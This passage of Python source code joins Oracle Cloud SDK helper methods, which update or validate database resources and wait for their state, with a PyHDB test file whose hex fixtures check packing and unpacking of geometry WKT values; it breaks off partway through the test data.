Calls :py:func:`~oci.database.DatabaseClient.update_maintenance_run` and waits for the :py:class:`~oci.database.models.MaintenanceRun` acted upon
to enter the given state(s).
:param str maintenance_run_id: (required)
The maintenance run OCID.
:param oci.database.models.UpdateMaintenanceRunDetails update_maintenance_run_details: (required)
Request to update the properties of a maintenance run.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.MaintenanceRun.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_maintenance_run`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_maintenance_run(maintenance_run_id, update_maintenance_run_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_maintenance_run(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_pluggable_database_and_wait_for_work_request(self, pluggable_database_id, update_pluggable_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_pluggable_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdatePluggableDatabaseDetails update_pluggable_database_details: (required)
Request to perform pluggable database update.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_pluggable_database(pluggable_database_id, update_pluggable_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_pluggable_database_and_wait_for_state(self, pluggable_database_id, update_pluggable_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_pluggable_database` and waits for the :py:class:`~oci.database.models.PluggableDatabase` acted upon
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdatePluggableDatabaseDetails update_pluggable_database_details: (required)
Request to perform pluggable database update.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.PluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_pluggable_database(pluggable_database_id, update_pluggable_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)

    def update_vm_cluster_and_wait_for_work_request(self, vm_cluster_id, update_vm_cluster_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.update_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
        to enter the given state(s).

        :param str vm_cluster_id: (required)
            The VM cluster `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param oci.database.models.UpdateVmClusterDetails update_vm_cluster_details: (required)
            Request to update the attributes of a VM cluster.

        :param list[str] work_request_states: (optional)
            An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
            Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_vm_cluster`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.update_vm_cluster(vm_cluster_id, update_vm_cluster_details, **operation_kwargs)
        work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
        lowered_work_request_states = [w.lower() for w in work_request_states]
        work_request_id = operation_result.headers['opc-work-request-id']
        try:
            waiter_result = oci.wait_until(
                self._work_request_client,
                self._work_request_client.get_work_request(work_request_id),
                evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)

    def update_vm_cluster_and_wait_for_state(self, vm_cluster_id, update_vm_cluster_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.update_vm_cluster` and waits for the :py:class:`~oci.database.models.VmCluster` acted upon
        to enter the given state(s).

        :param str vm_cluster_id: (required)
            The VM cluster `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param oci.database.models.UpdateVmClusterDetails update_vm_cluster_details: (required)
            Request to update the attributes of a VM cluster.

        :param list[str] wait_for_states:
            An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmCluster.lifecycle_state`

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_vm_cluster`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.update_vm_cluster(vm_cluster_id, update_vm_cluster_details, **operation_kwargs)
        if not wait_for_states:
            return operation_result
        lowered_wait_for_states = [w.lower() for w in wait_for_states]
        wait_for_resource_id = operation_result.data.id
        try:
            waiter_result = oci.wait_until(
                self.client,
                self.client.get_vm_cluster(wait_for_resource_id),
                evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
                **waiter_kwargs
            )
            result_to_return = waiter_result
            return result_to_return
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)

    def update_vm_cluster_network_and_wait_for_work_request(self, exadata_infrastructure_id, vm_cluster_network_id, update_vm_cluster_network_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.update_vm_cluster_network` and waits for the oci.work_requests.models.WorkRequest
        to enter the given state(s).

        :param str exadata_infrastructure_id: (required)
            The Exadata infrastructure `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param str vm_cluster_network_id: (required)
            The VM cluster network `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param oci.database.models.UpdateVmClusterNetworkDetails update_vm_cluster_network_details: (required)
            Request to update the properties of a VM cluster network.

        :param list[str] work_request_states: (optional)
            An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
            Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_vm_cluster_network`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.update_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_id, update_vm_cluster_network_details, **operation_kwargs)
        work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
        lowered_work_request_states = [w.lower() for w in work_request_states]
        work_request_id = operation_result.headers['opc-work-request-id']
        try:
            waiter_result = oci.wait_until(
                self._work_request_client,
                self._work_request_client.get_work_request(work_request_id),
                evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)

    def update_vm_cluster_network_and_wait_for_state(self, exadata_infrastructure_id, vm_cluster_network_id, update_vm_cluster_network_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.update_vm_cluster_network` and waits for the :py:class:`~oci.database.models.VmClusterNetwork` acted upon
        to enter the given state(s).

        :param str exadata_infrastructure_id: (required)
            The Exadata infrastructure `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param str vm_cluster_network_id: (required)
            The VM cluster network `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param oci.database.models.UpdateVmClusterNetworkDetails update_vm_cluster_network_details: (required)
            Request to update the properties of a VM cluster network.

        :param list[str] wait_for_states:
            An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmClusterNetwork.lifecycle_state`

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_vm_cluster_network`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.update_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_id, update_vm_cluster_network_details, **operation_kwargs)
        if not wait_for_states:
            return operation_result
        lowered_wait_for_states = [w.lower() for w in wait_for_states]
        wait_for_resource_id = operation_result.data.id
        try:
            waiter_result = oci.wait_until(
                self.client,
                self.client.get_vm_cluster_network(wait_for_resource_id),
                evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
                **waiter_kwargs
            )
            result_to_return = waiter_result
            return result_to_return
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)

    def upgrade_database_and_wait_for_work_request(self, database_id, upgrade_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.upgrade_database` and waits for the oci.work_requests.models.WorkRequest
        to enter the given state(s).

        :param str database_id: (required)
            The database `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param oci.database.models.UpgradeDatabaseDetails upgrade_database_details: (required)
            Request to perform a database upgrade.

        :param list[str] work_request_states: (optional)
            An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
            Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.upgrade_database`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.upgrade_database(database_id, upgrade_database_details, **operation_kwargs)
        work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
        lowered_work_request_states = [w.lower() for w in work_request_states]
        work_request_id = operation_result.headers['opc-work-request-id']
        try:
            waiter_result = oci.wait_until(
                self._work_request_client,
                self._work_request_client.get_work_request(work_request_id),
                evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)

    def upgrade_database_and_wait_for_state(self, database_id, upgrade_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.upgrade_database` and waits for the :py:class:`~oci.database.models.Database` acted upon
        to enter the given state(s).

        :param str database_id: (required)
            The database `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param oci.database.models.UpgradeDatabaseDetails upgrade_database_details: (required)
            Request to perform a database upgrade.

        :param list[str] wait_for_states:
            An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.upgrade_database`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.upgrade_database(database_id, upgrade_database_details, **operation_kwargs)
        if not wait_for_states:
            return operation_result
        lowered_wait_for_states = [w.lower() for w in wait_for_states]
        wait_for_resource_id = operation_result.data.id
        try:
            waiter_result = oci.wait_until(
                self.client,
                self.client.get_database(wait_for_resource_id),
                evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
                **waiter_kwargs
            )
            result_to_return = waiter_result
            return result_to_return
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)

    def validate_vm_cluster_network_and_wait_for_work_request(self, exadata_infrastructure_id, vm_cluster_network_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.validate_vm_cluster_network` and waits for the oci.work_requests.models.WorkRequest
        to enter the given state(s).

        :param str exadata_infrastructure_id: (required)
            The Exadata infrastructure `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param str vm_cluster_network_id: (required)
            The VM cluster network `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param list[str] work_request_states: (optional)
            An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
            Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.validate_vm_cluster_network`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.validate_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_id, **operation_kwargs)
        work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
        lowered_work_request_states = [w.lower() for w in work_request_states]
        work_request_id = operation_result.headers['opc-work-request-id']
        try:
            waiter_result = oci.wait_until(
                self._work_request_client,
                self._work_request_client.get_work_request(work_request_id),
                evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
                **waiter_kwargs
            )
            return waiter_result
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)

    def validate_vm_cluster_network_and_wait_for_state(self, exadata_infrastructure_id, vm_cluster_network_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
        """
        Calls :py:func:`~oci.database.DatabaseClient.validate_vm_cluster_network` and waits for the :py:class:`~oci.database.models.VmClusterNetwork` acted upon
        to enter the given state(s).

        :param str exadata_infrastructure_id: (required)
            The Exadata infrastructure `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param str vm_cluster_network_id: (required)
            The VM cluster network `OCID`__.

            __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

        :param list[str] wait_for_states:
            An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.VmClusterNetwork.lifecycle_state`

        :param dict operation_kwargs:
            A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.validate_vm_cluster_network`

        :param dict waiter_kwargs:
            A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
            as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
        """
        operation_result = self.client.validate_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_id, **operation_kwargs)
        if not wait_for_states:
            return operation_result
        lowered_wait_for_states = [w.lower() for w in wait_for_states]
        wait_for_resource_id = operation_result.data.id
        try:
            waiter_result = oci.wait_until(
                self.client,
                self.client.get_vm_cluster_network(wait_for_resource_id),
                evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
                **waiter_kwargs
            )
            result_to_return = waiter_result
            return result_to_return
        except Exception as e:
            raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
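Every `*_and_wait_for_state` helper above builds the same case-insensitive lifecycle-state predicate inline as a lambda passed to `oci.wait_until`. The sketch below factors that predicate out so its behavior is visible in isolation; `make_state_matcher` is a hypothetical name used only for illustration, not part of the OCI SDK.

```python
def make_state_matcher(wait_for_states):
    """Return a predicate that matches lifecycle states case-insensitively."""
    lowered = [s.lower() for s in wait_for_states]

    def matches(lifecycle_state):
        # A missing/empty state never matches, mirroring the
        # `getattr(r.data, 'lifecycle_state') and ...` guard in the lambdas above.
        return bool(lifecycle_state) and lifecycle_state.lower() in lowered

    return matches

matcher = make_state_matcher(["AVAILABLE", "TERMINATED"])
```

Because the comparison lowercases both sides, callers may pass states in any case, which is why the helpers lowercase `wait_for_states` once up front.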
# File: tests/types/test_geometry.py (repo peterandluc/PyHDB, Apache-2.0)
from io import BytesIO
import random
#
import pytest
from pyhdb.protocol import types
# ########################## Test value unpacking #####################################
@pytest.mark.parametrize("given,expected", [
(b"\xFF", None),
(b"\x2d\x50\x4f\x49\x4e\x54\x20\x28\x31\x2e\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x32\x2e\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29",
"POINT (1.0000000000000000 2.0000000000000000)"),
(b"\x59\x4c\x49\x4e\x45\x53\x54\x52\x49\x4e\x47\x20\x28\x31\x2e\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x32\x2e" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c" + \
b"\x20\x32\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x29",
"LINESTRING (1.0000000000000000 2.0000000000000000, " + \
"2.0000000000000000 1.0000000000000000)"),
(b"\xa7\x50\x4f\x4c\x59\x47\x4f\x4e\x20\x28\x28\x31\x2e\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20\x30" + \
b"\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x20\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x2c\x20\x2d\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20\x31\x2e\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29\x29",
"POLYGON ((1.0000000000000000 1.0000000000000000, " + \
"0.0000000000000000 0.0000000000000000, " + \
"-1.0000000000000000 1.0000000000000000, " + \
"1.0000000000000000 1.0000000000000000))"),
(b"\x32\x4d\x55\x4c\x54\x49\x50\x4f\x49\x4e\x54\x20\x28\x31\x2e\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x32\x2e" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29",
"MULTIPOINT (1.0000000000000000 2.0000000000000000)"),
(b"\x60\x4d\x55\x4c\x54\x49\x4c\x49\x4e\x45\x53\x54\x52\x49\x4e\x47\x20" + \
b"\x28\x28\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x20\x32\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x2c\x20\x32\x2e\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29\x29",
"MULTILINESTRING ((1.0000000000000000 2.0000000000000000, " + \
"2.0000000000000000 1.0000000000000000))"),
(b"\xae\x4d\x55\x4c\x54\x49\x50\x4f\x4c\x59\x47\x4f\x4e\x20\x28\x28\x28" + \
b"\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x2c\x20\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x20\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20\x2d\x31\x2e\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20\x31" + \
b"\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x29\x29\x29",
"MULTIPOLYGON (((1.0000000000000000 1.0000000000000000, " + \
"0.0000000000000000 0.0000000000000000, " + \
"-1.0000000000000000 1.0000000000000000, " + \
"1.0000000000000000 1.0000000000000000)))"),
])
def test_unpack_geometry_wkt(given, expected):
    given = BytesIO(given)
    assert types.Geometry.from_resultset(given) == expected
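The byte fixtures above imply the wire framing that `types.Geometry` works with: a one-byte length (`0xFF` meaning NULL) followed by the ASCII WKT text, with the packed form additionally prefixed by the type code `0x1D`. The sketch below reproduces just that framing for short strings; `pack_wkt` is a hypothetical helper, and pyhdb's real string packing also covers payloads longer than 245 bytes, which this sketch deliberately does not.

```python
def pack_wkt(wkt):
    # Sketch of the framing the test vectors imply: type code 0x1D, a one-byte
    # length (0xFF for NULL), then the ASCII-encoded WKT payload.
    if wkt is None:
        return b"\x1d\xff"
    payload = wkt.encode("ascii")
    if len(payload) > 245:
        raise ValueError("long-string length escapes are not sketched here")
    return b"\x1d" + bytes([len(payload)]) + payload
```

For example, `"POINT (1.0000000000000000 2.0000000000000000)"` is 45 bytes, which is why the corresponding fixture starts with `\x1d\x2d`.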
# ########################## Test value packing #####################################
@pytest.mark.parametrize("given,expected", [
(None, b"\x1d\xFF", ),
("POINT (1.0000000000000000 2.0000000000000000)",
b"\x1d\x2d\x50\x4f\x49\x4e\x54\x20\x28\x31\x2e\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x32\x2e\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29"),
("LINESTRING (1.0000000000000000 2.0000000000000000, " + \
"2.0000000000000000 1.0000000000000000)",
b"\x1d\x59\x4c\x49\x4e\x45\x53\x54\x52\x49\x4e\x47\x20\x28\x31\x2e\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x32" + \
b"\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x2c\x20\x32\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x29"),
("POLYGON ((1.0000000000000000 1.0000000000000000, " + \
"0.0000000000000000 0.0000000000000000, " + \
"-1.0000000000000000 1.0000000000000000, " + \
"1.0000000000000000 1.0000000000000000))",
b"\x1d\xa7\x50\x4f\x4c\x59\x47\x4f\x4e\x20\x28\x28\x31\x2e\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20" + \
b"\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x20\x30\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x2c\x20\x2d\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x20\x31\x2e\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29\x29"),
("MULTIPOINT (1.0000000000000000 2.0000000000000000)",
b"\x1d\x32\x4d\x55\x4c\x54\x49\x50\x4f\x49\x4e\x54\x20\x28\x31\x2e\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x32" + \
b"\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29"),
("MULTILINESTRING ((1.0000000000000000 2.0000000000000000, " + \
"2.0000000000000000 1.0000000000000000))",
b"\x1d\x60\x4d\x55\x4c\x54\x49\x4c\x49\x4e\x45\x53\x54\x52\x49\x4e\x47" + \
b"\x20\x28\x28\x31\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x20\x32\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x2c\x20\x32\x2e\x30\x30\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x31\x2e\x30\x30\x30\x30\x30" + \
b"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x29\x29"),
("MULTIPOLYGON (((1.0000000000000000 1.0000000000000000, " + \
"0.0000000000000000 0.0000000000000000, " + \
"-1.0000000000000000 1.0000000000000000, " + \
"1.0000000000000000 1.0000000000000000)))",
